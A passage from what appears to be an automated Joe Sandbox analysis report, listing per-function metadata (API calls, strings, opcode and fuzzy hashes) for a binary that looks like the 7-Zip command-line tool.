                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$CloseHandle
                                • String ID: :Zone.Identifier
                                • API String ID: 1247544577-2436405130
                                • Opcode ID: fbc2f6aaaab96bd404d5dd457fd47a9212d142e16cf48eba9684c3e2a0013325
                                • Instruction ID: 6ae8159831995c80a80afed96457c3f82fe08b25ea4c8076c273605594e205c0
                                • Opcode Fuzzy Hash: fbc2f6aaaab96bd404d5dd457fd47a9212d142e16cf48eba9684c3e2a0013325
                                • Instruction Fuzzy Hash: 48417172205A4590DF20EF21F56039E6720EB81BD8F948217FA9E576A9CF3CC9C5C749
                                Function 0044FE56 Relevance: 12.6, APIs: 10, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 1a9010453f8884423405b25a672cb8940b963d6f8b7818a8295dd92102788598
                                • Instruction ID: be085158f522db3f739e7c5dca17feb8cac4e8c3b3b0a5776a438792a5f020aa
                                • Opcode Fuzzy Hash: 1a9010453f8884423405b25a672cb8940b963d6f8b7818a8295dd92102788598
                                • Instruction Fuzzy Hash: B5517F77314AC886C761DB26E59025E6760F386BC5F805416DE8E47B25CF3DC49ACB08
                                Function 0045012C Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: af3f1e211811b37b9a1a8ed7a3c5ddc6e65841d653c1e5f38f8fe79044a4063c
                                • Instruction ID: d7eaa864be4d602f5f94e47cd27c51546117c5b8faa3ad5f054f16509b234abf
                                • Opcode Fuzzy Hash: af3f1e211811b37b9a1a8ed7a3c5ddc6e65841d653c1e5f38f8fe79044a4063c
                                • Instruction Fuzzy Hash: 764118B6245F4982CB24DB26E4902AE6361F7C9F85F449522DE5E87724DF7CC8A9C308
                                Function 00423EF8 Relevance: 12.5, APIs: 10, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 51443f359d02d4d6a3316e986999cefc06be1755e231d8eee587d5ab8d0cdd41
                                • Instruction ID: 2731de6ff34bf1b2411f42ee48c4cb4a69e71f4bd3912b7943fb619a056d46ec
                                • Opcode Fuzzy Hash: 51443f359d02d4d6a3316e986999cefc06be1755e231d8eee587d5ab8d0cdd41
                                • Instruction Fuzzy Hash: EB011E33351A49938B04EB37EA510AC6320F785B98744421A9F2D9B661DF68DCB6C344
                                Function 0045567C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: /$\$a$z
                                • API String ID: 1294909896-3795456795
                                • Opcode ID: cbb6cdde9bbede098d1a09249e70140af35240451739d7ec759a066a9ed656c4
                                • Instruction ID: 289f456ae5e69d956412a27ad6b437b75ce8bd04a14ab63b18b1809ee81c2d32
                                • Opcode Fuzzy Hash: cbb6cdde9bbede098d1a09249e70140af35240451739d7ec759a066a9ed656c4
                                • Instruction Fuzzy Hash: 1B41F716501E84D6DB30AF21D0246BA6760F319BE6FC94117DE99033A2EB7C89DEC30D
                                Function 00441150 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: crc$flags$memuse
                                • API String ID: 1534225298-339511674
                                • Opcode ID: ee3cc5f497cd575c053a9b2727d09fa0226d7ed92785b44af46c4ad46eaa8492
                                • Instruction ID: c187fc6b7c8eab1920a4344811d5bb0793eb95b3eb2c9f4b90ceb4b2ed08083a
                                • Opcode Fuzzy Hash: ee3cc5f497cd575c053a9b2727d09fa0226d7ed92785b44af46c4ad46eaa8492
                                • Instruction Fuzzy Hash: CC418272244585D1DB30EB26E4402AE6761F784798F944227AB9EC7A78DF6CC9CBC70C
                                Function 0045E7D8 Relevance: 11.6, APIs: 9, Instructions: 393COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 8fa9b1f7ebc1e23d285a2f05e39b6ed4397f476a62e20dee1f3cc1c2c8cc79d4
                                • Instruction ID: d906ce36ac29cf85b376e10b2fd847829032621bddc6ac703310ff95fecb5640
                                • Opcode Fuzzy Hash: 8fa9b1f7ebc1e23d285a2f05e39b6ed4397f476a62e20dee1f3cc1c2c8cc79d4
                                • Instruction Fuzzy Hash: 44F1AB72204B8592CB28DF36D59026E7B60F389F89F045126DF8E57725DF38C99AC708
                                Function 00415C18 Relevance: 11.4, APIs: 9, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 191017a4a65d9787c0d091cd8e389a0f8edc0b3f56ec8753be0991dbb6cee37b
                                • Instruction ID: f0ac99bd957982af242576a29c3ca0989bbfff981322cf883b261ee32bd69137
                                • Opcode Fuzzy Hash: 191017a4a65d9787c0d091cd8e389a0f8edc0b3f56ec8753be0991dbb6cee37b
                                • Instruction Fuzzy Hash: 90419632315B84C7CA20EE27F5411DE6710EBD6FD8B488226EEA95B759DF2CC5828704
                                Function 0045CF80 Relevance: 11.3, APIs: 9, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID:
                                • API String ID: 1475443563-0
                                • Opcode ID: cb30fffc6ea31fde2c5ee4f40d9d3f4f980a3b1abe6e9151bdc7ecd07fbb7933
                                • Instruction ID: fabfe490a34d0611492806c1e53278cba2d129f7981a5eeab8481a878ae9362d
                                • Opcode Fuzzy Hash: cb30fffc6ea31fde2c5ee4f40d9d3f4f980a3b1abe6e9151bdc7ecd07fbb7933
                                • Instruction Fuzzy Hash: 5D3181A670971095EB24DB2B99403AA23659B16FC9FC45026DF094738AFF6CC64BD30E
                                Function 00451410 Relevance: 11.3, APIs: 9, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                                • Instruction ID: ae88b004c5f826645cd08b055d917e70f00a3c59fce02902785a452487d21c67
                                • Opcode Fuzzy Hash: 9a8387ae601500122f572f294227a66f10f0ad07e155eb24b92f1dd97e1a69c6
                                • Instruction Fuzzy Hash: 9101403228664D42C715FB32F6516AE5710E7C2B95F441127EE5A97721CE7CC4E78708
                                Function 00451378 Relevance: 11.3, APIs: 9, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                                • Instruction ID: 7371351374e8099fcb39e8bc6c6764f9ee869e4b806337162ca18049512c7270
                                • Opcode Fuzzy Hash: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                                • Instruction Fuzzy Hash: EF01FF3228564D83C751F736F6516AE5710EBC6B99F401127EE2A97721CE7CC4EB8708
                                Function 00451708 Relevance: 11.3, APIs: 9, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                                • Instruction ID: 188c43c2a241b6bdc4f41e55fa77ee05e6aa9d2b459ac4a2f98f140259b66873
                                • Opcode Fuzzy Hash: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                                • Instruction Fuzzy Hash: A301FF3228564D43CB51F736F6516AE5310EBC2B99F402127EE2A97621DE7CC4EB870C
                                Function 0045158F Relevance: 11.3, APIs: 9, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                                • Instruction ID: 897ef3f89f93d82ebd949510a1acbcfb057f7ccc658a170a771a0e77b606c8aa
                                • Opcode Fuzzy Hash: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                                • Instruction Fuzzy Hash: 4201FB3228564E83CB51F736F6516AE5310EBC2B99F401127EE2A97621CE7CC5E7860C
                                Function 004514BB Relevance: 11.3, APIs: 9, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                                • Instruction ID: 6a6ff7ed4f1f77e6531d1d802e996b6f8714346139e32ec2fd460d2d0ec25ba5
                                • Opcode Fuzzy Hash: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                                • Instruction Fuzzy Hash: 09F0FB3228564D83CB51F736F6516AE5310EBC2B95F401127EE2A97621CE7CC4E78608
                                Function 00466BAC Relevance: 11.3, APIs: 9, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                                • Instruction ID: abbd55726dc2dfa1fb3c45d862883bd8827f38a55976306c0c095568ffecb622
                                • Opcode Fuzzy Hash: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                                • Instruction Fuzzy Hash: F9010072651A8D8ACB10AE37ED910AC1314EB85B9C7584637AE2D9F715DEACCCA28344
                                Function 004230DC Relevance: 11.3, APIs: 9, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                                • Instruction ID: 695e9eb3bb3a859f7b7fa25ff7737dff87e9c006ebe3e86eccb566cc2d9e6ff9
                                • Opcode Fuzzy Hash: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                                • Instruction Fuzzy Hash: C10144727506894AC710AE37ED911AC1320EB81B9D7484226AE1D9B755DE6CCCA28344
                                Function 0041A3F8 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 229COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: ??\
                                • API String ID: 1534225298-3933555804
                                • Opcode ID: 647aee96f56e6ea2199074f0ca06e49257a7263789404048bcb9741760ba45c4
                                • Instruction ID: d232cdbd57df880c2e25a8f4e3aabfcca4aeddf442fd649bf02cd917d299395c
                                • Opcode Fuzzy Hash: 647aee96f56e6ea2199074f0ca06e49257a7263789404048bcb9741760ba45c4
                                • Instruction Fuzzy Hash: 3C71797321668096CB20DF21D4101EE7320FB55788B88912BEB9A47714EB7DC9F6D30A
                                Function 00424624 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 199COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 00424872
                                  • Part of subcall function 004241F4: free.MSVCRT ref: 004242A5
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 004242C8
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 004242EE
                                  • Part of subcall function 004241F4: _CxxThrowException.MSVCRT ref: 00424322
                                • free.MSVCRT ref: 004248BB
                                • _CxxThrowException.MSVCRT ref: 004248FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$free
                                • String ID: Incorrect wildcard type marker$Too short switch$inorrect switch
                                • API String ID: 3129652135-3392774464
                                • Opcode ID: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                                • Instruction ID: 5250dcb62d7afbd3650168a1cbd0f5f43e5589dab0fa9527ac0e79fca8cfaf91
                                • Opcode Fuzzy Hash: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                                • Instruction Fuzzy Hash: 827116263186E0D5DB20DB25F4403AEAB61F7D1798FD04117EB8A47B68DBBCC896C709
                                Function 0046CB4C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046CC30
                                • fputs.MSVCRT ref: 0046CD17
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • fputs.MSVCRT ref: 0046CE03
                                  • Part of subcall function 004124A8: fflush.MSVCRT ref: 004124AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fflushfputcmemset
                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                • API String ID: 2975459029-4064182643
                                • Opcode ID: 3ce92fbe1b35c5ec52de361611b6f157965ae34472b577e79a4e80d5b2bfd629
                                • Instruction ID: 4254177e66274b2cf9f7cf290ffb35f89914f4833fbc312029ac8099ce794598
                                • Opcode Fuzzy Hash: 3ce92fbe1b35c5ec52de361611b6f157965ae34472b577e79a4e80d5b2bfd629
                                • Instruction Fuzzy Hash: 31718F667006C595CE28EF26E6913BB6711F741B84F08402BDF9E87302EF6CD8A4835A
                                Function 00461F74 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsmemsetstrlen$free
                                • String ID:
                                • API String ID: 2852212109-2735817509
                                • Opcode ID: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                                • Instruction ID: 2d22bbc2e04a46147c0487197a3e0881e2bc0a4de8dd74f4ceb8f7c7e3560c89
                                • Opcode Fuzzy Hash: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                                • Instruction Fuzzy Hash: 9051D372208A8096C720DB26E9503DFA7A1F385BC4F589527EF8A07B18EF7CC595CB05
                                Function 0046062C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0046064E
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • fputs.MSVCRT ref: 00460716
                                • fputs.MSVCRT ref: 004607F8
                                • fputs.MSVCRT ref: 00460814
                                • LeaveCriticalSection.KERNEL32 ref: 004608B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                • String ID: ???
                                • API String ID: 2578255354-1053719742
                                • Opcode ID: 2493a75a0bb9975d8930162c51ba8e1bee14d7ae64b68b26e2e51425f8a9db9c
                                • Instruction ID: 286b10f4b5256edc1cd81f800045f304151a3a774e5b7fbfe97cb01345c1de25
                                • Opcode Fuzzy Hash: 2493a75a0bb9975d8930162c51ba8e1bee14d7ae64b68b26e2e51425f8a9db9c
                                • Instruction Fuzzy Hash: DF615BB2300A81A2DB1DEB26D6943EA6320F784B89F444017DF1D47364EF78E5B9C349
                                Function 00419CD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • DeviceIoControl.KERNEL32 ref: 00419D32
                                • DeviceIoControl.KERNEL32 ref: 00419E16
                                • DeviceIoControl.KERNEL32 ref: 00419E6D
